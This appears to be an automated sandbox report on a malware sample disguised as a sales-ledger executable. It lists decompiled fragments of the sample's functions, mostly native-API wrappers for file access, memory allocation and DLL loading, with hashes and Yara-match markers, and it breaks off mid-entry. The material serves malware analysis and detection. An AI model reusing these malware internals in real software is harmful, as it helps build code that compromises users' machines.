                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                0x00405adf
                                                                                                                0x00405ae6
                                                                                                                0x00405af5
                                                                                                                0x00405af6
                                                                                                                0x00405afb
                                                                                                                0x00405b00
                                                                                                                0x00405b0a
                                                                                                                0x00405b18
                                                                                                                0x00405b19
                                                                                                                0x00405b1e
                                                                                                                0x00405b2c
                                                                                                                0x00405b2d
                                                                                                                0x00405b36
                                                                                                                0x00405b37
                                                                                                                0x00405b3c
                                                                                                                0x00405b4a
                                                                                                                0x00405b4b
                                                                                                                0x00405b54
                                                                                                                0x00405b55
                                                                                                                0x00405b5a
                                                                                                                0x00405b68
                                                                                                                0x00405b69
                                                                                                                0x00405b72
                                                                                                                0x00405b73
                                                                                                                0x00405b7b
                                                                                                                0x00000000
                                                                                                                0x00405b7b
                                                                                                                0x00405b80

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 6300 Parent PID: 5792 Require your Sales Ledger from 01-April-2020.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 00419FF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00419FF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB40(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d52
				_t12 =  &_a8; // 0x414d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                0x00419ff3
                                                                                                                0x00419fff
                                                                                                                0x0041a007
                                                                                                                0x0041a012
                                                                                                                0x0041a02d
                                                                                                                0x0041a035
                                                                                                                0x0041a039

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(RMA,5EB6522D,FFFFFFFF,00414A11,?,?,RMA,?,00414A11,FFFFFFFF,5EB6522D,00414D52,?,00000000), ref: 0041A035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID: RMA$RMA
                                                                                                                • API String ID: 2738559852-4212641106
                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction ID: 47391d639efac316311ffb50b35ad37227ecba0ab777e9e89f8ea37865c82293
                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction Fuzzy Hash: 86F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D634E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C840( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B080(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                0x0040acec
                                                                                                                0x0040acef
                                                                                                                0x0040acf4
                                                                                                                0x0040acf9
                                                                                                                0x0040ad03
                                                                                                                0x0040ad08
                                                                                                                0x0040ad0b
                                                                                                                0x0040ad0d
                                                                                                                0x0040ad15
                                                                                                                0x0040ad1a
                                                                                                                0x0040ad1a
                                                                                                                0x0040ad21
                                                                                                                0x0040ad29
                                                                                                                0x0040ad2c
                                                                                                                0x0040ad2e
                                                                                                                0x0040ad42
                                                                                                                0x00000000
                                                                                                                0x0040ad44
                                                                                                                0x0040ad4a
                                                                                                                0x0040acfe
                                                                                                                0x0040acfe
                                                                                                                0x0040acfe

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction ID: aaafee299be000192330cf74775bd8359abf95cc5c4a35aabfb05e746359e07b
                                                                                                                • Opcode Fuzzy Hash: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction Fuzzy Hash: 390152B5D4020DA7DB10EBA5DC82FDEB7789B54308F0041A9E908A7281F634EB548B95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00419F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                0x00419f4f
                                                                                                                0x00419f57
                                                                                                                0x00419f8d
                                                                                                                0x00419f91

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B97,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B97,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction ID: 8ea736774ba8911b8279b9cfd49072e0c789f2d5db859ac2b7c7e6ef757ed24e
                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction Fuzzy Hash: E6F0BDB2205208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A11A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E0041A11A(intOrPtr __eax, void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t24;

				asm("stc");
				asm("cmpsb");
				 *0x8bec8b55 = __eax;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E0041AB40(_t24, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                                                                                                0x0041a11a
                                                                                                                0x0041a11b
                                                                                                                0x0041a11f
                                                                                                                0x0041a123
                                                                                                                0x0041a12f
                                                                                                                0x0041a137
                                                                                                                0x0041a159
                                                                                                                0x0041a15d

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 4f6312040c1c4c527d4eec3ba9275e1bf8f8d87874d96c6a82b94338ecc8357f
                                                                                                                • Instruction ID: a4d4fd2dc1c7cce92c01dab68fc750d0060a81f555cd1c8a76a42e018189ccae
                                                                                                                • Opcode Fuzzy Hash: 4f6312040c1c4c527d4eec3ba9275e1bf8f8d87874d96c6a82b94338ecc8357f
                                                                                                                • Instruction Fuzzy Hash: A6F0A0B5114189AFDB14DF98DC80CE7B7A9FF88214B14865EF94997202C234E851CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A120, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                0x0041a12f
                                                                                                                0x0041a137
                                                                                                                0x0041a159
                                                                                                                0x0041a15d

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction ID: 41af93f0003505e3ba0015a63dd184b135cd46b9981c195137c9cf1cde5447cb
                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction Fuzzy Hash: 66F015B2200208ABCB14DF89CC81EEB77ADAF88754F118149BE0997241C634F810CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A06C, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A06C(intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t12;

				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a923
				E0041AB40(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}





                                                                                                                0x0041a073
                                                                                                                0x0041a076
                                                                                                                0x0041a07f
                                                                                                                0x0041a087
                                                                                                                0x0041a095
                                                                                                                0x0041a099

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00414D30,?,?,00414D30,00409CD3,FFFFFFFF), ref: 0041A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: b81fb5363605bf24873cd93e636d2ff31fe83626f29bfcb9d8555f37793bfb66
                                                                                                                • Instruction ID: 6e27a0efa3a96ac2f6fedcb50caf6b4bb38ff60494d6deac5c3fbed59fec3483
                                                                                                                • Opcode Fuzzy Hash: b81fb5363605bf24873cd93e636d2ff31fe83626f29bfcb9d8555f37793bfb66
                                                                                                                • Instruction Fuzzy Hash: A8E0EC75200214ABD710EB98CC85E977769EB48764F15455ABA199B282C534F91087D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A070(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                0x0041a073
                                                                                                                0x0041a076
                                                                                                                0x0041a07f
                                                                                                                0x0041a087
                                                                                                                0x0041a095
                                                                                                                0x0041a099

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00414D30,?,?,00414D30,00409CD3,FFFFFFFF), ref: 0041A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction ID: f089eca4a97aa68d4ce2a285eb3c247b66ebf33d40eb504c7b8fdb92d1b2e104
                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction Fuzzy Hash: 53D01776200214ABD710EB99CC85FE7BBADEF48760F154499BA199B242C534FA1086E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f58b47be8d36a9ed2f36d87164e3b8e72d636e65d95e8ce84a3f88d5c3aead36
                                                                                                                • Instruction ID: 5b6c54bb1772f9975fb541abd3999d8d8a63a40011e42b8f4b0489eaebc381ea
                                                                                                                • Opcode Fuzzy Hash: f58b47be8d36a9ed2f36d87164e3b8e72d636e65d95e8ce84a3f88d5c3aead36
                                                                                                                • Instruction Fuzzy Hash: DB9002B131100803D14471A984047460005A7E0341F51C011A5054594EC6998DD577A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: df6a441445c346f8cdc3d4a0d7058dcd7ddebf31713af0c867fc4f817917b00d
                                                                                                                • Instruction ID: 590a0d49db023b12b52b4a88a2e8037745b104cd0396b7c9587839e6c61ab59b
                                                                                                                • Opcode Fuzzy Hash: df6a441445c346f8cdc3d4a0d7058dcd7ddebf31713af0c867fc4f817917b00d
                                                                                                                • Instruction Fuzzy Hash: 4D9002A135100843D10461A98414B060005E7F1341F51C015E1054594DC659CC52726A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3ff0e20e0adbb5f39a7bc97fd776b426a0ed37696bf17f3008e66aa6249d3a78
                                                                                                                • Instruction ID: 95fb975a627a982661c7adf77744ea9d24e59590ccdbdd124592aad0929879ad
                                                                                                                • Opcode Fuzzy Hash: 3ff0e20e0adbb5f39a7bc97fd776b426a0ed37696bf17f3008e66aa6249d3a78
                                                                                                                • Instruction Fuzzy Hash: 7A90027131100813D11561A985047070009A7E0281F91C412A0414598DD6968952B265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 36a909f409d098f63f8336f37e076ac5715de18faa90738d466e1c6bbf79aedf
                                                                                                                • Instruction ID: 524096b2731bec3c13a9c5929a95382a7a288a882931dd72aacf956165a59cee
                                                                                                                • Opcode Fuzzy Hash: 36a909f409d098f63f8336f37e076ac5715de18faa90738d466e1c6bbf79aedf
                                                                                                                • Instruction Fuzzy Hash: 26900261352045535549B1A984045074006B7F0281791C012A1404990CC5669856E765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8dac7613c13fd0d85021690d6df75107a86ae05988fc9208d5a4db42d01875de
                                                                                                                • Instruction ID: 3d726f78d438b1f40fa4c50b29b817a956d7d79f81d101d232a97abba0a9b2b6
                                                                                                                • Opcode Fuzzy Hash: 8dac7613c13fd0d85021690d6df75107a86ae05988fc9208d5a4db42d01875de
                                                                                                                • Instruction Fuzzy Hash: CA90026171100903D10571A98404616000AA7E0281F91C022A1014595ECA658992B275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 56a5c7d469b94b5b56d33791c2e83a51d4bf64855bb3ea44c08c8333538be5cc
                                                                                                                • Instruction ID: 513de79b5026886c83f9d2f6772d905134da0a8c773b2158033d026557ce7e83
                                                                                                                • Opcode Fuzzy Hash: 56a5c7d469b94b5b56d33791c2e83a51d4bf64855bb3ea44c08c8333538be5cc
                                                                                                                • Instruction Fuzzy Hash: E790026171100443414471B9C8449064005BBF1251751C121A0988590DC599886567A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 6a16f09c1f8e9a5c1fc3cd8954b5d53ff0d4b7e5bc81ece66ad7b3f104eaf20c
                                                                                                                • Instruction ID: a02130f322642449a22cf335e8067a902baf91f4cce972a84b1e426379d284b5
                                                                                                                • Opcode Fuzzy Hash: 6a16f09c1f8e9a5c1fc3cd8954b5d53ff0d4b7e5bc81ece66ad7b3f104eaf20c
                                                                                                                • Instruction Fuzzy Hash: 8B90027131140803D10461A9881470B0005A7E0342F51C011A1154595DC665885176B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ac43baedaf2b7ac9db38c428550c79b4302cf49103db7436884780e08498fcfc
                                                                                                                • Instruction ID: 8c6896602530e1ad9bec98f630e1357064eaf5709443beed92bbc4c6240b4dc7
                                                                                                                • Opcode Fuzzy Hash: ac43baedaf2b7ac9db38c428550c79b4302cf49103db7436884780e08498fcfc
                                                                                                                • Instruction Fuzzy Hash: 2290026132180443D20465B98C14B070005A7E0343F51C115A0144594CC95588616665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8bd64f0f136ba5f3bef057d25afdebce537ef05fca00fd1207d0190ba66d4fce
                                                                                                                • Instruction ID: 0ded258487caaae369ec61f6967085c7c2fbed2658b641c3b14494f37a6903b1
                                                                                                                • Opcode Fuzzy Hash: 8bd64f0f136ba5f3bef057d25afdebce537ef05fca00fd1207d0190ba66d4fce
                                                                                                                • Instruction Fuzzy Hash: 14900265321004030109A5A947045070046A7E5391351C021F1005590CD66188616265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8284af2be5b6391420cfd061534c67206cff5b9b34070317706d5bae744a2be2
                                                                                                                • Instruction ID: 8e9b15cc163836af7f1725deebf2ba40d8638b268b7fcc787ccfde75ad36edaf
                                                                                                                • Opcode Fuzzy Hash: 8284af2be5b6391420cfd061534c67206cff5b9b34070317706d5bae744a2be2
                                                                                                                • Instruction Fuzzy Hash: B69002A131200403410971A98414616400AA7F0241B51C021E10045D0DC56588917269
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 649f59fea488116465397dd0d6bc11f14ed45bf77c9e802e5ebf2057e10a12bc
                                                                                                                • Instruction ID: 202cb14c335c83f2623a14f0a8fc305454970c398825dcfc3128741ba7d23627
                                                                                                                • Opcode Fuzzy Hash: 649f59fea488116465397dd0d6bc11f14ed45bf77c9e802e5ebf2057e10a12bc
                                                                                                                • Instruction Fuzzy Hash: C190027131100803D10465E994086460005A7F0341F51D011A5014595EC6A588917275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ab7a4b6012675b2286e725be83680df63e73818d528fa4f997ffd63a6104b41b
